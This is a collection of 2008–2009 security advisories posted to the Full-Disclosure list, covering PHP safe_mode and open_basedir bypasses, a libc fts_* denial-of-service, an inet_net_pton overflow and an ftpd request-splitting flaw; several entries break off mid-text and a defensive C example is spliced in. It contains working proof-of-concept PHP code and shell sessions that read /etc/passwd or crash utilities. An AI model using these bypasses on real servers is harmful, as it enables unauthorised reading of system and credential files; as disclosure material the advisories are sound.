PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique PHP-specific
features thrown in. The goal of the language is to allow web developers
to write dynamically generated pages quickly.

PHP supports libcurl, a library created by Daniel Stenberg, that allows
you to connect and communicate to many different types of servers with
many different types of protocols. libcurl currently supports the http,
https, ftp, gopher, telnet, dict, file, and ldap protocols. libcurl also
supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading (this
can also be done with PHP's ftp extension), HTTP form based upload,
proxies, cookies, and user+password authentication.

--- 1. PHP 5.2.9 curl safe_mode & open_basedir bypass ---
The main problem exists in the checking of safe_mode & open_basedir for curl
functions. There is a difference between checking the access and the
implementation of the operations.

Example code:
curl_setopt($ch, CURLOPT_URL, "file:file:etc/passwd");

curl first checks safe_mode and open_basedir for

"file:etc/passwd"
/* realpath is ./file:/etc/passwd */

and in the next step will read

"file:etc/passwd"
(without wrapper => /etc/passwd)

To attack, we need to cheat PHP by creating a virtual tree like

./file:/
./file:/etc/
./file:/etc/passwd/

Example for /etc/hosts :

./file:/
./file:/etc/
./file:/etc/hosts/

So if the file is executed as user X, we have to create special
subdirectories.

---EXAMPLE-EXPLOIT---
<?php
mkDIR("file:");
chdir("file:");
mkDIR("etc");
chdir("etc");
mkDIR("passwd");
chdir("..");
chdir("..");

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "file:file:etc/passwd");
curl_setopt($ch, CURLOPT_HEADER, 0);

curl_exec($ch);

curl_close($ch);
?>
---EXAMPLE-EXPLOIT---

The previous changes may have contributed to this error in PHP 5.2.9.
We discourage the use of safe_mode & open_basedir as the main
security measure.

Exploit:
http://securityreason.com/achievement_exploitalert/11

--- 2. Fix ---
Do not use safe_mode and open_basedir as the main safety measure.

--- 3. Greets ---
sp3x Infospec Chujwamwdupe p_e_a pi3 schain and r.i.p. ladybms

--- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib [a.t] securityreason [d00t] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl



[Full-disclosure] libc:fts_*():multiple vendors, Denial-of-service

2009-03-05 Thread Maksymilian Arciemowicz

[libc:fts_*():multiple vendors, Denial-of-service ]

Author: Maksymilian Arciemowicz
SecurityReason.com
Date:
Dis.: 21.10.2008
Pub.: 04.03.2009

CVE: CVE-2009-0537

We are going to inform all vendors about this problem.

Affected Software (official):
- OpenBSD 4.4
  /usr/src/lib/libc/gen/fts.c
- Microsoft Interix
  6.0 10.0.6030.0 x86
- Microsoft Vista Enterprise
  SearchIndexer.exe

probably more...

Original URL:
http://securityreason.com/achievement_securityalert/60

--- 0. Description ---

The fts functions are provided for traversing UNIX file hierarchies.
The fts_open() function returns a "handle" on a file hierarchy, which is
then supplied to the other fts functions.
The function fts_read() returns a pointer to a structure describing one
of the files in the file hierarchy.
The function fts_children() returns a pointer to a linked list of
structures, each of which describes one of the files contained in a
directory within the hierarchy.

typedef struct _ftsent {
        unsigned short fts_info;        /* flags for FTSENT structure */
        char *fts_accpath;              /* access path */
        char *fts_path;                 /* root path */
        size_t fts_pathlen;             /* strlen(fts_path) */
        char *fts_name;                 /* file name */
        size_t fts_namelen;             /* strlen(fts_name) */
        short fts_level;                /* depth (-1 to N) */
        int fts_errno;                  /* file errno */
        long fts_number;                /* local numeric value */
        void *fts_pointer;              /* local address value */
        struct _ftsent *fts_parent;     /* parent directory */
        struct _ftsent *fts_link;       /* next file structure */
        struct _ftsent *fts_cycle;      /* cycle structure */
        struct stat *fts_statp;         /* stat(2) information */
} FTSENT;

--- 1. libc:fts_*():multiple vendors, Denial-of-service ---
The main problem exists in fts_level of the ftsent structure. The type of
fts_level is short.

let's see /usr/src/lib/libc/gen/fts.c (OpenBSD)

---line-616-625---
/*
 * Figure out the max file name length that can be stored in the
 * current path -- the inner loop allocates more path as necessary.
 * We really wouldn't have to do the maxlen calculations here, we
 * could do them in fts_read before returning the path, but it's a
 * lot easier here since the length is part of the dirent structure.
 *
 * If not changing directories set a pointer so that can just append
 * each new name into the path.
 */
---line-616-625---

"We really wouldn't have to do the maxlen calculations here..."

There should be some level or pathlen monitoring here. Should.

        short fts_level;                /* depth (-1 to N) */

fts_level is of type short, not aleph zero

---line-247-249---
#define NAPPEND(p)                                                      \
        (p->fts_path[p->fts_pathlen - 1] == '/'                         \
            ? p->fts_pathlen - 1 : p->fts_pathlen)
---line-247-249---

This function will crash when we access wrongly allocated memory.

So, what is wrong:

127# pwd
/home/cxib
127# du /home/
4   /home/cxib/.ssh
Segmentation fault (core dumped)
127# rm -rf Samotnosc
Segmentation fault (core dumped)
127# chmod -R 000 Samotnosc
Segmentation fault (core dumped)


127# gdb -q du
(no debugging symbols found)
(gdb) r /home/
Starting program: /usr/bin/du /home/
4   /home/cxib/.ssh

Program received signal SIGSEGV, Segmentation fault.
0x0b3e65c1 in fts_read (sp=0x8a1b11c0) at /usr/src/lib/libc/gen/fts.c:385
385 name:   t = sp->fts_path + NAPPEND(p->fts_parent);
(gdb) print p->fts_level
$1 = -19001
(gdb) print p->fts_path
$2 = 0x837c9000 

and we have answer.


127# cd /home/cxib
127# mkdir len
127# cd len
127# mkdir 24
127# mkdir 23
127# mkdir 22
127# cd 22
127# perl -e '$a="C"x22;for(1..5){ ! -d $a and mkdir $a and chdir $a }'
127# du .
Segmentation fault (core dumped)
127# cd ../23/
127# perl -e '$a="C"x23;for(1..5){ ! -d $a and mkdir $a and chdir $a }'
127# du .
Segmentation fault (core dumped)
127# cd ../24/
127# perl -e '$a="C"x24;for(1..5){ ! -d $a and mkdir $a and chdir $a }'
127# du .
/* Will print correctly output */

In all cases, the function should return an error flag "ENAMETOOLONG".

The security consequences can be derived from the crash of the program.
All combinations like " while ( fts_read ( ) ) " and the " ftw ( ) "
function constitute a potential risk.

Examples of vulnerable programs:
du
rm
chmod -R
chgrp -R

In the case of Microsoft Interix, the situati

[Full-disclosure] SecurityReason: PHP 5.2.6 SAPI php_getuid() overload

2008-12-07 Thread Maksymilian Arciemowicz

[ SecurityReason.com : PHP 5.2.6 SAPI php_getuid() overload ]

Author: Maksymilian Arciemowicz
securityreason.com
Date:
Written: 20.11.2008
Public: 05.12.2008

SecurityReason Research
SecurityAlert Id: 59

SecurityRisk: High

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/59
Vendor: http://www.php.net

--- 0. Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique PHP-specific
features thrown in. The goal of the language is to allow web developers
to write dynamically generated pages quickly.

http://pl.php.net/manual/pl/refs.utilspec.server.php

--- 1. PHP 5.2.6 SAPI php_getuid() overload ---

Using PHP 5.2.6 as an Apache module, many security checks can be bypassed. To
understand this issue, we first need to know where the problem is.

127# cd /www/trafka
127# ls -la
total 12
drwxr-xr-x  2 www  www  512 Sep 10 03:49 .
drwxr-xr-x  4 www  www  512 Sep 10 03:41 ..
-rw-r--r--  1 www  www   26 Sep 10 03:49 .htaccess
-rw-r--r--  1 www  www   33 Sep 10 03:49 not.php
-rw-r--r--  1 www  www  107 Sep 10 03:49 pufff.php
-rw-r--r--  1 www  www   27 Sep 10 03:49 sleep.php
127# cat .htaccess
php_value   error_log   /etc/
127# cat not.php

127# cat pufff.php

127# cat sleep.php

127# apachectl restart
/usr/local/sbin/apachectl restart: httpd restarted
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/not.php
only echo
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=
127#

Now error_log is empty

Example exploit:

127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/sleep.php
^C
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/


Any new "apache child" process allows overloading the environment, like error_log.


127# apachectl restart
/usr/local/sbin/apachectl restart: httpd restarted
127# ps -aux -U www
USER   PID %CPU %MEM   VSZ   RSS  TT  STAT STARTED  TIME COMMAND
www   6361  0.0  0.5 18676 14248  ??  S 4:01AM   0:00.00
/usr/local/sbin/httpd
www   6362  0.0  0.5 18676 14248  ??  S 4:01AM   0:00.00
/usr/local/sbin/httpd
www   6363  0.0  0.5 18676 14248  ??  S 4:01AM   0:00.00
/usr/local/sbin/httpd
www   6364  0.0  0.5 18676 14248  ??  S 4:01AM   0:00.00
/usr/local/sbin/httpd
www   6365  0.0  0.5 18676 14248  ??  S 4:01AM   0:00.00
/usr/local/sbin/httpd
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# ps -aux -U www
USER   PID %CPU %MEM   VSZ   RSS  TT  STAT STARTED  TIME COMMAND
www   6361  0.0  0.5 18676 14288  ??  S 4:01AM   0:00.00
/usr/local/sbin/httpd
www   6362  0.0  0.5 18676 14248  ??  S 4:01AM   0:00.00
/usr/local/sbin/httpd
www   6363  0.0  0.5 18676 14248  ??  S 4:01AM   0:00.00
/usr/local/sbin/httpd
www   6364  0.0  0.5 18676 14248  ??  S 4:01AM   0:00.00
/usr/local/sbin/httpd
www   6365  0.0  0.5 18676 14248  ??  S 4:01AM   0:00.00
/usr/local/sbin/httpd
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=/etc/
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=
127# curl http://localhost/trafka/pufff.php
safe_mode=1
error_log=
127# ps -aux -U www
USER   PID %CPU %MEM   VSZ   RSS  TT  STAT STARTED  TIME COMMAND
www   6361  0.0  0.5 18676 14288  ??  S 4:01AM   0:00.00
/usr/local/sbin/httpd
www   6362  0.0  0.5 18676 14288  ??  S 4:01AM   0:00.00
/usr/local/sbin/httpd
www   6363  0.0  0.5 18676 14288  ??  S 4:01AM   0:00.00
/usr/local/sbin/httpd
www   6364  0.0  0.5 18676 14288  ??  S 4:01AM   0:00.00
/usr/local/sbin/httpd
www   6365  0.0  0.5 18676 14288  ??  S 4:01AM   0:00.00
/usr/local/sbin/httpd
127#

So what is wrong?

Let's try to understand this problem. Let's start with a difference

www   6361  0.0  0.5 18676 14248  ??  S 4:01AM   0:00.00
/usr/local/sbin/httpd

and

www   6361  0.0  0.5 18676 14288  ??  S 4:01AM   0:00.00
/usr/local/sbin/httpd

RSS: 14288-14248 = 40

memory leak? No.

In first request, we have declared error_log, via .htaccess.

--- main/main.c ---
...
STD_PHP_INI_ENTRY("error_log",  NULL,   
PHP_INI_ALL,
OnUpdateErrorLog,  

[Full-disclosure] SecurityReason : PHP 5.2.6 dba_replace() destroying file

2008-11-27 Thread Maksymilian Arciemowicz

[ SecurityReason.com PHP 5.2.6 dba_replace() destroying file ]

Author: Maksymilian Arciemowicz
http://securityreason.com
Date:
Written: 10.11.2008
Public: 28.11.2008

SecurityReason Research
SecurityAlert Id: 58
SecurityRisk: Medium

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/58
Vendor: http://www.php.net

--- 0. Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique PHP-specific
features thrown in. The goal of the language is to allow web developers
to write dynamically generated pages quickly.

NOTE:
These functions build the foundation for accessing Berkeley DB style
databases.

dba_replace - Replace or insert entry

--- 1. dba_replace() destroying file ---
The function dba_replace() does not filter the key and value strings. There is
a possibility of destroying the file.

# cat /www/dba.hack.php

# cat /www/about.ini
PATH=/
CURR=.
HOME=/home/
# php /www/dba.hack.php
# cat /www/about.ini
PATH=/
CURR=.
HOME=/www/
#

Well.
But let's try to use

# cat /www/dba.ham.php

# php /www/dba.ham.php
# cat /www/about.ini
#

Now /www/about.ini is empty.

--- 2. How to fix ---
Fixed in CVS

http://cvs.php.net/viewvc.cgi/php-src/NEWS?r1=1.2027.2.547.2.1313&r2=1.2027.2.547.2.1314&;

--- 3. Greets ---
sp3x p_e_a Infospec schain

--- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ]
Email: cxib [ a t] securityreason [d ot ] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl



[Full-disclosure] SecurityReason : PHP 5.2.6 (error_log) safe_mode bypass

2008-11-20 Thread Maksymilian Arciemowicz

[ SecurityReason.com PHP 5.2.6 (error_log) safe_mode bypass ]

Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
Written: 10.11.2008
Public: 20.11.2008

SecurityReason Research
SecurityAlert Id: 57

CWE: CWE-264
SecurityRisk: Medium

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/57
Vendor: http://www.php.net

--- 0. Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is
borrowed from C, Java and Perl with a couple of unique PHP-specific
features thrown in. The goal of the language is to allow web developers
to write dynamically generated pages quickly.

error_log

They allow you to define your own error handling rules, as well as
modify the way the errors can be logged. This allows you to change and
enhance error reporting to suit your needs.

--- 0. error_log const. bypassed by php_admin_flag ---
The main problem is between using safe_mode in global mode

php.ini:
safe_mode = On

and declaring via php_admin_flag


...
php_admin_flag safe_mode On


When we create some PHP script in /www/ and try to call:

ini_set("error_log", "/hack/");

or in /www/.htaccess

php_value error_log "/hack/bleh.php"


Result:

Warning: Unknown: SAFE MODE Restriction in effect. The script whose uid
is 80 is not allowed to access /hack/ owned by uid 1001 in Unknown on line 0

Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect.
The script whose uid is 80 is not allowed to access /hack/ owned by uid
1001 in /www/phpinfo.php on line 4


It was for safe_mode declared in php.ini. But if we use

php_admin_flag safe_mode On

in httpd.conf, we will get only

Warning: ini_set() [function.ini-set]: SAFE MODE Restriction in effect.
The script whose uid is 80 is not allowed to access /hack/ owned by uid
1001 in /www/phpinfo.php on line 4

the syntax in .htaccess

php_value error_log "/hack/blehx.php"

is allowed and bypasses safe_mode.

example exploit:
error_log("", 0);

--- 2. How to fix ---
Fixed in CVS

http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1315&view=markup

Note:
Do not use safe_mode as a main safety.

--- 3. Greets ---
sp3x Infospec schain p_e_a pi3

--- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl



[Full-disclosure] multiple vendor ftpd - Cross-site request forgery

2008-09-26 Thread Maksymilian Arciemowicz

[ multiple vendor ftpd - Cross-site request forgery ]

Author: Maksymilian Arciemowicz
securityreason.com
Date:
- Written: 03.09.2008
- Public: 26.09.2008

SecurityReason Research
SecurityAlert Id: 56

CVE: not assigned
SecurityRisk: Low

Affected Software:
This problem has been discovered on OpenBSD 4.3 .
- Affected systems:
+ OpenBSD
+ NetBSD
+ FreeBSD
+ some linux
- Affected applications:
+ proFTPd
+ others

Advisory URL:
http://securityreason.com/achievement_securityalert/56


--- 0. Description ---
ftpd -- Internet File Transfer Protocol server

The ftpd utility is the Internet File Transfer Protocol server process. The 
server uses the TCP protocol and listens at the port specified with the -P 
option or in the ``ftp'' service specification; see services(5).

Cross-site request forgery, also known as one click attack, sidejacking or 
session riding and abbreviated as CSRF (Sea-Surf[1]) or XSRF, is a type of 
malicious exploit of a website whereby unauthorized commands are 
transmitted from a user the website trusts. Contrary to cross-site 
scripting (XSS), which exploits the trust a user has for a particular site, 
cross-site request forgery exploits the trust that a site has for a 
particular user.

http://en.wikipedia.org/wiki/Cross-site_request_forgery

--- 1. ftpd bsd - Cross-site request forgery ---
The main problem is that a long command is divided into several others. The 
problem stems from the use of the for(;;) loop and the fgets() function.

Example:
Command
"AA
AAA
AAA
AAA
AAA
AAA
AAA
AAA
AAA
AAA
AAA
AAA
AAA"

will be split into

500
'AA
AAA
AAA
AAA
AAA
AAA
AA': command 
not understood.
500
'AA
AAA
AAA
AAA
AAA
AAA
AA'


When we send a request to the ftp daemon via a browser and the path is longer than 512, our 
URL will be split.

/* FreeBSD 7.0 */
ftp://[EMAIL PROTECTED]///SYST

returns the result of the SYST command:
215 UNIX Type: L8 Version: BSD-199506


/* NetBSD 4.0 */
ftp://ftp.netbsd.org///SYST

returns the result of the SYST command:
215 UNIX Type: L8 V

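The splitting shown above is what a fixed-size fgets() buffer does with an over-long line: the first chunk comes back without a newline and the remainder is read as a fresh command. As an added example that is not part of this advisory or of any ftpd source, the reader below detects the missing newline, discards the rest of the line and reports the command as too long instead of splitting it; CMD_MAX, the helper names and the sample session are constructed for the demonstration.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

/* fmemopen() is POSIX.1-2008; declared here in case the feature macro above
 * is seen too late by the headers. */
FILE *fmemopen(void *buf, size_t size, const char *mode);

/* Assumed line limit, mirroring the roughly 512-byte buffer the advisory describes. */
#define CMD_MAX 512

enum read_status {
    CMD_OK,        /* a complete line fit in the buffer */
    CMD_TOO_LONG,  /* line exceeded the buffer; its remainder was discarded */
    CMD_EOF        /* no more input */
};

/* Read one command line into buf (capacity CMD_MAX). A bare fgets() loop hands
 * an over-long line back in pieces and each piece becomes a command; here the
 * over-long line is drained to its newline and reported once as CMD_TOO_LONG. */
enum read_status read_command(FILE *fp, char *buf)
{
    if (fgets(buf, CMD_MAX, fp) == NULL)
        return CMD_EOF;

    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') {
        buf[--n] = '\0';                  /* strip LF */
        if (n > 0 && buf[n - 1] == '\r')
            buf[--n] = '\0';              /* strip CR of CRLF */
        return CMD_OK;
    }
    if (feof(fp))
        return CMD_OK;                    /* final line without a newline */

    /* Buffer filled before a newline arrived: discard the rest of the line. */
    int c;
    while ((c = fgetc(fp)) != EOF && c != '\n')
        ;
    buf[0] = '\0';
    return CMD_TOO_LONG;
}

/* Count accepted commands in a byte stream; *rejected receives the over-long count. */
int count_commands(const char *input, int *rejected)
{
    FILE *fp = fmemopen((void *)input, strlen(input), "r");
    char buf[CMD_MAX];
    int accepted = 0;
    *rejected = 0;
    if (fp == NULL)
        return -1;
    for (;;) {
        enum read_status st = read_command(fp, buf);
        if (st == CMD_EOF)
            break;
        if (st == CMD_OK)
            accepted++;
        else
            (*rejected)++;
    }
    fclose(fp);
    return accepted;
}

/* For contrast: how many "commands" a bare fgets() loop sees in the same stream. */
int count_commands_naive(const char *input)
{
    FILE *fp = fmemopen((void *)input, strlen(input), "r");
    char buf[CMD_MAX];
    int lines = 0;
    if (fp == NULL)
        return -1;
    while (fgets(buf, CMD_MAX, fp) != NULL)
        lines++;
    fclose(fp);
    return lines;
}

/* Constructed sample session: a normal USER line, one 1500-byte line, then SYST. */
const char *sample_session(void)
{
    static char s[2048];
    if (s[0] == '\0') {
        strcpy(s, "USER anonymous\r\n");
        size_t p = strlen(s);
        memset(s + p, 'A', 1500);
        p += 1500;
        strcpy(s + p, "\r\nSYST\r\n");
    }
    return s;
}

int main(void)
{
    int rejected = 0;
    int ok = count_commands(sample_session(), &rejected);
    printf("bounded reader: %d accepted, %d rejected\n", ok, rejected);
    printf("bare fgets loop: %d commands\n", count_commands_naive(sample_session()));
    return 0;
}
```

The bare loop turns the 1500-byte line into three separate "commands", which is exactly the split the advisory shows; the bounded reader accepts the two real commands and rejects the long line once.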
[Full-disclosure] libc/net inet_net_pton() integer overflow

2008-08-23 Thread Maksymilian Arciemowicz

[WLB-2008080064: inet_net_pton() integer overflow ]

Author: Maksymilian Arciemowicz (cxib)
SecurityReason.com
Date:
- Written: 02.08.2008
- Public: 22.08.2008

SecurityRisk: Low
It is a bug without a high security risk. We are going to inform all vendors 
about this problem.

Affected Software:
libc inet_net_pton.c
ver ISC Bind
- OpenBSD fixed

Original URL WLB-2008080064 :
http://securityreason.com/wlb_show/WLB-2008080064

Vendor: http://www.isc.org/index.pl?/sw/bind/index.php


--- 0. Description ---
inet_net_pton - Internet network number manipulation routines

SYNOPSIS:
int
 inet_net_pton(int af, const char *src, void *dst, size_t size);

The inet_net_pton() function converts a presentation format Internet network 
number (that is, printable form as held in a character string) to network 
format (usually a struct in_addr or some other internal binary representation, 
in network byte order).  It returns the number of bits (either computed based 
on the class, or specified with /CIDR), or -1 if a failure occurred (in which 
case errno will have been set.  It will be set to ENOENT if the Internet 
network number was not valid).

Caution: The dst field should be zeroed before calling inet_net_pton() as the 
function will only fill the number of bytes necessary to encode the network 
number in network byte order.

The only value for af currently supported is AF_INET.  size is the size of the 
result buffer dst.

NETWORK NUMBERS (IP VERSION 4)
The external representation of Internet network numbers may be specified in one 
of the following forms:

a
a.b
a.b.c
a.b.c.d

Any of the above four forms may have ``/bits'' appended where ``bits'' is in 
the range 0-32 and is used to explicitly specify the number of bits in the 
network address.  When ``/bits'' is not specified the number of bits


--- 1. libc/net inet_net_pton() integer overflow ---
The main problem exists in the inet_net_pton() function. Let's look at this function

inet_net_pton.c

---
int
inet_net_pton(int af, const char *src, void *dst, size_t size)
{
    switch (af) {
    case AF_INET:
        return (inet_net_pton_ipv4(src, dst, size));
    default:
        errno = EAFNOSUPPORT;
        return (-1);
    }
}
---

which calls inet_net_pton_ipv4(). So let's look at it..

---START---
static int
inet_net_pton_ipv4(const char *src, u_char *dst, size_t size)
{
    static const char
        xdigits[] = "0123456789abcdef",
        digits[] = "0123456789";
    int n, ch, tmp, dirty, bits;
    const u_char *odst = dst;

    ch = *src++;
    if (ch == '0' && (src[0] == 'x' || src[0] == 'X')
        && isascii(src[1]) && isxdigit(src[1])) {
        /* Hexadecimal: Eat nybble string. */
        if (size <= 0)
            goto emsgsize;
        *dst = 0, dirty = 0;
        src++;  /* skip x or X. */
        while ((ch = *src++) != '\0' &&
               isascii(ch) && isxdigit(ch)) {
            if (isupper(ch))
                ch = tolower(ch);
            n = strchr(xdigits, ch) - xdigits;
            assert(n >= 0 && n <= 15);
            *dst |= n;
            if (!dirty++)
                *dst <<= 4;
            else if (size-- > 0)
                *++dst = 0, dirty = 0;
            else
                goto emsgsize;
        }
        if (dirty)
            size--;
    } else if (isascii(ch) && isdigit(ch)) {
        /* Decimal: eat dotted digit string. */
        for (;;) {
            tmp = 0;
            do {
                n = strchr(digits, ch) - digits;
                assert(n >= 0 && n <= 9);
                tmp *= 10;
                tmp += n;
                if (tmp > 255)
                    goto enoent;
            } while ((ch = *src++) != '\0' &&
                     isascii(ch) && isdigit(ch));
            if (size-- <= 0)
                goto emsgsize;
            *dst++ = (u_char) tmp;
            if (ch == '\0' || ch == '/')
                break;
            if (ch != '.')
                goto enoent;
            ch = *src++;
            if (!isascii(ch) || !isdigit(ch))
                goto enoent;
        }


[Full-disclosure] PHP 5.2.6 chdir(), ftok() (standard ext) safe_mode bypass

2008-06-18 Thread Maksymilian Arciemowicz

[PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass ]

Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
- Written: 10.05.2008
- Public: 17.06.2008

SecurityReason Research
SecurityAlert Id: 55

CVE: CVE-2008-2666
CWE: CWE-264
SecurityRisk: Medium

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/55
Vendor: http://www.php.net

--- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from 
C, Java and Perl with a couple of unique PHP-specific features thrown in. The 
goal of the language is to allow web developers to write dynamically generated 
pages quickly.

chdir - Change directory

SYNOPSIS:

bool chdir  ( string $directory  )

http://pl.php.net/manual/en/function.chdir.php


ftok - Convert a pathname and a project identifier to a System V IPC key

SYNOPSIS:

int ftok  ( string $pathname  , string $proj  )

http://pl.php.net/manual/en/function.ftok.php

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL 
NOT LIST ALL VULNERABLE FUNCTIONS

--- 1. chdir(), ftok() (from standard ext) and more safe_mode bypass ---
Let's look at the chdir() function

---
PHP_FUNCTION(chdir)
{
    char *str;
    int ret, str_len;

    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str,
                              &str_len) == FAILURE) {
        RETURN_FALSE;
    }

    if ((PG(safe_mode) && !php_checkuid(str, NULL,
         CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC)) {
        RETURN_FALSE;
    }
    ret = VCWD_CHDIR(str);

    if (ret != 0) {
        php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s (errno %d)",
                         strerror(errno), errno);
        RETURN_FALSE;
    }

    RETURN_TRUE;
}
---

str is being checked by safe_mode.
Example:

---
Warning: chdir(): SAFE MODE Restriction in effect.  The script whose uid is 80 
is not allowed to access / owned by uid 0 in /www/mb/mb.php on line 8
---

In the current directory we create a subdirectory named "http:". => it is then possible 
to call chdir("http://../../../../../../")
and we are in /

Why?

TRUE==((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) 
|| php_check_open_basedir(str TSRMLS_CC))

for
str="http://../../../../../../"

safe_mode will ignore all paths with http://

The same situation exists with the ftok() function (and more)

---EXAMPLE1---
cxib# cat /www/wufff.php
<?
echo getcwd()."\n";
chdir("/etc/");
echo getcwd()."\n";
?>
cxib# ls -la /www/wufff.php
-rw-r--r--  1 www  www  62 Jun 17 17:14 /www/wufff.php
cxib# php /www/wufff.php
/www

Warning: chdir(): SAFE MODE Restriction in effect.  The script whose uid is 80 
is not allowed to access /etc/ owned by uid 0 in /www/wufff.php on line 3
/www
cxib#
---/EXAMPLE1---

---EXAMPLE2---
cxib# ls -la /www/wufff.php
-rw-r--r--  1 www  www  74 Jun 17 17:13 /www/wufff.php
cxib# ls -la /www/http:
total 8
drwxr-xr-x   2 www  www   512 Jun 17 17:12 .
drwxr-xr-x  19 www  www  4608 Jun 17 17:13 ..
cxib# cat /www/wufff.php
<?
echo getcwd()."\n";
chdir("http://../../etc/");
echo getcwd()."\n";
?>
cxib# php /www/wufff.php
/www
/etc
cxib#
---/EXAMPLE2---

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL 
NOT LIST ALL VULNERABLE FUNCTIONS

--- 2. How to fix ---
Do not use safe_mode as the main safeguard

--- 3. Greets ---
sp3x Infospec schain p_e_a Chujwamwdupe

--- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl


[Full-disclosure] PHP 5.2.6 posix_access() (posix ext) safe_mode bypass

2008-06-18 Thread Maksymilian Arciemowicz

[PHP 5.2.6 posix_access() (posix ext) safe_mode bypass ]

Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason.com
Date:
- Written: 10.05.2008
- Public: 17.06.2008

SecurityReason Research
SecurityAlert Id: 54

CVE: CVE-2008-2665
CWE: CWE-264
SecurityRisk: Low

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/54
Vendor: http://www.php.net

--- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from 
C, Java and Perl with a couple of unique PHP-specific features thrown in. The 
goal of the language is to allow web developers to write dynamically generated 
pages quickly.

posix_access - Determine accessibility of a file

SYNOPSIS:

bool posix_access  ( string $file  [, int $mode  ] )

http://pl2.php.net/manual/pl/function.posix-access.php

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL 
NOT LIST ALL VULNERABLE FUNCTIONS

--- 1. PHP 5.2.6 posix_access() safe_mode bypass ---
Let's look at the posix_access() function

---
PHP_FUNCTION(posix_access)
{
    long mode = 0;
    int filename_len, ret;
    char *filename, *path;

    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|l", &filename,
                              &filename_len, &mode) == FAILURE) {
        RETURN_FALSE;
    }

    path = expand_filepath(filename, NULL TSRMLS_CC);

    if (!path) {
        POSIX_G(last_error) = EIO;
        RETURN_FALSE;
    }

    if (php_check_open_basedir_ex(path, 0 TSRMLS_CC) ||
        (PG(safe_mode) && (!php_checkuid_ex(filename, NULL,
         CHECKUID_CHECK_FILE_AND_DIR, CHECKUID_NO_ERRORS)))) {
        efree(path);
        POSIX_G(last_error) = EPERM;
        RETURN_FALSE;
    }

    ret = access(path, mode);
    efree(path);

    if (ret) {
        POSIX_G(last_error) = errno;
        RETURN_FALSE;
    }

    RETURN_TRUE;
}
---

var_dump(posix_access("http://../../../etc/passwd"))==True
var_dump(posix_access("/etc/passwd"))==False

Why?

Because path = expand_filepath(filename, NULL TSRMLS_CC); will change 
"http://../../../etc/passwd" to path=/etc/passwd

(PG(safe_mode) && (!php_checkuid_ex(filename, NULL, 
CHECKUID_CHECK_FILE_AND_DIR, CHECKUID_NO_ERRORS))) will check the original path 
"http://../../../etc/passwd". http:// is used in php_checkuid_ex(), so 
safe_mode is bypassed.

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL 
